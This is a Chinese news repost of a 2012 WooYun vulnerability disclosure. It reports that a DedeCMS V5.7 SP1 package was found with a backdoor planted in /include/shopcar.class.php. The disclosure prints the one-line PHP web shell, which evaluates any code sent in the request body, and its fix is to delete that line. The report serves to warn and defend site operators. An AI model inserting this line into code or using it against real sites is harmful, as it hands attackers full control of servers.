php上传后门,Dedecms疑似被植入后门 上传PHP后门可控制整个网站

Admin5站长网2月21日消息,昨日乌云漏洞报告平台()发布漏洞报告,称国内知名开源CMS软件Dedecms被入侵种植后门,影响使用dedecms的网站和企业,后门代码在/include/shopcar.class.php中,希望直接使用dedecms又未作审计的网站速度处理。360网站安全检测官方微博称经过工程师的测试,可以上传PHP后门来控制整个网站。目前已经将该后门加入到webscan网站安全扫描平台扫描库中,希望各网站及时进行扫描确认。

织梦内容管理系统(DedeCms)早期由IT柏拉图个人开发, 以简单、实用、开源闻名,受到广大个人站长的青睐。DedeCms站长用户众多,目前其官方还未对漏洞做出回应。希望广大使用Dedecms的站长能及时对网站进行安全检测,做好漏洞防范,等待官方给出解决办法。

漏洞概要

缺陷编号: WooYun-2012-05416

漏洞标题: Dedecms疑似被植入后门

相关厂商: Dedecms

漏洞作者: jsbug

提交时间: 2012-03-20

公开时间: 2012-03-20

漏洞类型: 成功的入侵事件

危害等级: 高

自评Rank: 10

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:

分享漏洞: 腾讯微博 新浪微博 Twitter 网易微博 豆瓣

漏洞详情

披露状态:

2012-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开

2012-03-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

DedeCMS V5.7 SP1正式版

UTF-8 GBK版本疑似被植入一句话后门

前几日下载并不存在此代码

详细说明:

shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

漏洞证明:

shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

修复方案:

删除@eval(file_get_contents('php://input'));

申请创业报道,分享创业好点子。点击此处,共同探讨创业新机遇!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值